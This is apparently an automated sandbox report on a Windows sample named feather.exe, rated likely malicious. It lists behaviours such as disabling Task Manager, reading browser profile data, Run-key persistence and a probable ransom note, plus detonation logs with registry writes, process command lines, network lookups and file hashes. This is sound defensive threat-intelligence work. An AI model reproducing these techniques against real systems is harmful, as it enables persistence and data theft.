Analysis Overview
SHA256
a4c5f72184b8bb06b6202074d1c81469ea56f74dace70d09fb5c798f85d8b700
Threat Level: Likely malicious
The file feather.exe was found to be: Likely malicious.
Malicious Activity Summary
Disables Task Manager via registry modification
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops file in System32 directory
Enumerates physical storage devices
Program crash
Unsigned PE
Opens file in notepad (likely ransom note)
Kills process with taskkill
Detects videocard installed
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Checks processor information in registry
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-11 17:50
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240508-en
Max time kernel
137s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240221-en
Max time kernel
134s
Max time network
133s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 505c754a28bcda01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000aaf38deff3e8ec4d8894b2d599e8a30700000000020000000000106600000001000020000000524c82847e936499d27bcd7a02c3b62ecf5902c66b67fa5b64b7fdff924cff1e000000000e800000000200002000000006ae5aa67ad849b168678434909a739b8f519531dc2b44a6f2593e174304111a900000005b4c41bf6f39c9d31d5e1737fd679f27f86415061bee76da60c3bfabec8e070be130a8a79526218b93e7a85f8cec05f744fee45d7ccdd38ce4dee3b4f4f68ccc1b35e4e8239f66f7379fc1f48da3dfd3b2654184d0bbae60f708022812b6d43de57eb2e9780fee76252cb9f0d136c8298d3ea816e0cd5f00d4b9a489609238d0957bc358fc80d35943a03600951ec1da40000000c4a26266c4c560f7bec0eb338f49c646fb965b4ac9d1d3931ffb476bd573aa5c1f08445587cd246d5440bb37ce00169f911fa2d775f869f4f4f16fd9eb097a55 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{757DBF51-281B-11EF-8E23-7EEA931DE775} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "424290255" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000aaf38deff3e8ec4d8894b2d599e8a3070000000002000000000010660000000100002000000026e3ed6f231ad3c069ae0cb575519e6448caf41614c0d584ea34eed06580d055000000000e80000000020000200000003c3d671e76bcd19fc3670c601537b5eeb4e16d1c7679bfbdc62799ea432a75002000000023af3187d474cbaf6f7686de676d534e8d0aeb814f3337510a6982f4e54a266240000000c8355d7fa31256d579937beba33a323f64b6d1cdf80c2edbc70e9249e98ad189e8e298e2cca39b3194e6008dac70518b00149935208340557f557ab8947d4b13 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2876 wrote to memory of 2632 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2876 wrote to memory of 2632 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2876 wrote to memory of 2632 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2876 wrote to memory of 2632 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2876 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab4B36.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar4C56.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 760197007fc3854891e329b8a8cdc1df |
| SHA1 | 1b7fbc61f30f8cc297914fd360269b336bebea14 |
| SHA256 | 939afc7d336929a44a5744437d5986ebfa97728cfef659780f102448d9bee44f |
| SHA512 | 030954f29e502b087e5cd6853bd4f2497ab1b2b1c1423b9340be42c206d119370f67f45bc320bda10fdc5cddce61ecc485d3e2b616a63449c3a6c30894bfe499 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 712c2516192389c435b73520bbcdbc2d |
| SHA1 | bcaa7853fa4cbce8451a65b2e46cf4b8efcc66dd |
| SHA256 | 7d80794d2b6730f253877b6c8d2723b19830a599de0821daf26cc735c377bb64 |
| SHA512 | 61036d910cdb80eeb66e7e128a2d5656f927581dc0b52d2218ec1f8e4cd5cac7e6a63e208f525ef69e9fab5b95d61cd63b34d88c0c852e1174ad190d8e8bc11b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 90ea0b4ae1b3f270bba30b1ef5241ec6 |
| SHA1 | 18a1062673ba52d1fd6cad871a86c2d2f2d5085a |
| SHA256 | 52bc93fe3775c52284d22127fb2f4391d8d2f11c75484e6ca52ba45ff0039a44 |
| SHA512 | 7f6bac2b40430434b26cd3889b144f2358c6a25a053cfd8069a65e18ff136db666e1c4345439fe4c7846ccb65f582a2c178d9ec2b3691ad53cabeaa4d4054bdb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 789412af97955b358e9da9d04255192b |
| SHA1 | 7705241a4b0b12372e294fb925479bfa7012e849 |
| SHA256 | 8ef880b2427ef102afc9066bf5d6875b2e6742b0e8531aa2867e8aa63cbcee3a |
| SHA512 | d9243510d39b685f5a95b93c687f8a084350b8d7779df341e331c1b6828b291a253384bdbf4d789ae50de1f7aa986c2fceacaac5aa168e1351b82d2c084d0538 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4aa10115c3e3c7940124ebaa194e58a3 |
| SHA1 | f111322e0947ccc428987372385ce9d8a54b2965 |
| SHA256 | 22e3720d1065ec5fce2dc6a829590da27d293ba539168c3aba16543b140e599c |
| SHA512 | 83e3fcf4a23db0a4582c1f84cc4fb521991432301947864d6521a081664583e6e2ab00102bc6b38d1219437b1c37161b2ce170f309d1a297db11f757f968cb52 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9dc2c4585c13fa36fec4d649d4619730 |
| SHA1 | 556dbf8058aed2acce4c177073873b66eaabb54c |
| SHA256 | a2c8130466130bdfbb599d628b638d801bd5e3b665d2eaa5a224c342da6cf6b5 |
| SHA512 | d6be4049ac8fb8863998ae19820708633088055c355048e17ab8dcba72632b6139d6decc35bf60ad632bd20934cf444ac0f79e191d8dbcea30c35c34899d754e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c1b0825637452a5c645ded430ac144ac |
| SHA1 | 7726c065928cd08a0d796a5228fe344e136c8964 |
| SHA256 | 14031ab5cff480d33d3eab720d4431ce8892c47c7728e3c4db4738d729166555 |
| SHA512 | 7409f667876ed401087efb0cf81e268ff5479f3f143e402d255797a5875a5ddadfd6d73024239ed9fb4570151354ce7ff06f62f3d106940fb204712f7e64abbf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ffd525fd72770caf9415017614694e62 |
| SHA1 | 57207f0ea42f234e0f16ff4f9b97f7e6fdecfe79 |
| SHA256 | 989b21449cc68466c5b3f66b06e7fcf0b3c489ff590a3249f2700a755d25acd7 |
| SHA512 | 3d7d5ee802fac0dbfbad472eb52e22d4202a5c3435029ec5dd1bb16583687f43896b3cd4c82c4b3980acdfcf26db502cd5ee020bf7395653771062ee5dae463a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c2475449b26d4d31041d0dfa39c39571 |
| SHA1 | 1674c6e9289ba5f0473744038030a52ed256cee7 |
| SHA256 | 4f01c30d008667632eb92add2b8b013256467d1ad943791584e41386402f0d6b |
| SHA512 | 7d1c50fe18586ff2048d3e80dbc2a67bf223c6b582d674c71f429dccf138ef8f3cf634d67603994016222b39e5b41989281a41b85ce871add3a0ffe6d59d4e16 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 083fc1a5265343ef15c1a6785c361f88 |
| SHA1 | a8c5f0146d1bf4452896a238eee1a48bcf07b986 |
| SHA256 | 10f48f9b700df267bee86c41096981f6eabea0d1164af9bb3dfea693675c234a |
| SHA512 | b456d3c24818790df5ad6962b6bb0cb5765333214edb7878ad8d694a8a37825cea863f12c08b3397329ac8e30ce99f3d1e4fb244e638e43b0a761eca33180def |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b3913be8935c3e6ff7abe579a5111e6f |
| SHA1 | 32bc827581a60a96308b0e26b357ef515f599eeb |
| SHA256 | 02c9e68e33b986b81639f2be443495df1d05640e53dbd8090ad31f9bf1ab9c96 |
| SHA512 | 3aee3e6560dce20733355c484c14c279dc327eb2ebe8ee1b03a15b5e145630d4938b6ad49308031c0d5d4d554a1f0173399c5db03246df49b443a545cb02edf2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1668b1299f9a814d1e7d9777dde62602 |
| SHA1 | 15bf81c5286fdc36a92451550f00477e2290cbb3 |
| SHA256 | 56c7ae4cb6de37a677c58448002b230241577da4fe33019353bce030891bc8d6 |
| SHA512 | bdca1f503ef09fdbbf36dcbd005e9567394583333bd14643d3d35ba36336051688423e780c84a5294d79a7e63d799107514591612f5d691005b6bd9565780625 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 77501c7bf276c94dc24fae4b2b396de2 |
| SHA1 | 8e99353da91e24c8b1937e541e09fb051614cb42 |
| SHA256 | 85b3ce6804f2ecdc30488e96e8d499b1ed63adf4c3436c1ef6c9f1b57a1eef9c |
| SHA512 | 7858801db7e009e96a1be437faeb7ea45724c1a3892ea24b5789efe93d684542b373855f8bd780bfcbf24d2bc6df7f6bbc553264f9792e0d60e3c4ff27763f56 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5d8f8b8bc90b88cfef0dbd8fb0582e13 |
| SHA1 | caed8013c77105525a69a52d802f7a075308e0dd |
| SHA256 | c570e85bfc5b06a872dedc6afce08c964c99979a4c901c93393d650540399b98 |
| SHA512 | 653726935c6fd9233d91b182d3c0c0c1a1871fc28468b9bedfd0713e63a2a855384299168a1af07da826e142ca1dec65d8210e538c3b634c55e9076b2bcc92df |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bbd2e84fe3ac7dde488ba8cb705369aa |
| SHA1 | 11bff1b9213c0fd1afcf5e11b39e2c39a1f4e985 |
| SHA256 | 09c522f3bcfc0361c0097457a7c6ba12135e1e93abf069604132ab81a8831441 |
| SHA512 | 8e90aaa9eb97b8d1618ba8af19911ea06d423372010379dd36e2aa682cf0186f5cb84ec605917f68ed586e63dcbdc1786fe25dbc760a18ff4330c9577dedce29 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 46e46c745d88adb497364f2c2692a723 |
| SHA1 | 4262d3e62b9d1efb1b08b5155fb1317a34a6f8ea |
| SHA256 | 968306410117a47951e30141a07010716d020d26e4fb3304af8334eddb470be5 |
| SHA512 | 07b234f0454c65a23ae1a04e24dfcdb9a6c9ed65ea4c51833961206c7ecc724ff0b6a2d2bb2b992f8a41b3f65fba4945e33ffd544e4a53d55af71696c15e25fd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 51de3a7a0660faeef27bd5a398a94b33 |
| SHA1 | 8f932b0d97701084fbe0117e0eee832be8fbe9c8 |
| SHA256 | 4ea0cfb595c8c5bf6457cfdf0bef55c6aac04dbe31ebb078a448c11d72cd6631 |
| SHA512 | 39d7e17bfaf3c1f6e56c3192871e27c881fc768b60409f195ea2c05b51bf9074a651f87880237400ac486b3d49ed29e591c4423fb87c6206730906e3d509272a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a86bdbe2e230be6149fba226b1fd535b |
| SHA1 | eae80e02f6e2d71113665e7132355cc3783bab60 |
| SHA256 | 931843141af965643e026b1287b6d1dd7438b0e225506cc7b7730cbda8b7fc83 |
| SHA512 | e1855409d03b6505d0621bd4865fd201523d65bc9cce57e4ce532df98873b094fc46f0a007b12df4c810f10ea20e068f2bf56c954c6da86d39b5624ec4e543ef |
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:56
Platform
win10v2004-20240226-en
Max time kernel
155s
Max time network
174s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3724 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.187.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.239.69.13.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240221-en
Max time kernel
118s
Max time network
125s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2256 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2256 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2256 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2256 -s 100
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240508-en
Max time kernel
121s
Max time network
124s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 220
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240426-en
Max time kernel
90s
Max time network
140s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2976 wrote to memory of 4256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2976 wrote to memory of 4256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2976 wrote to memory of 4256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4256 -ip 4256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
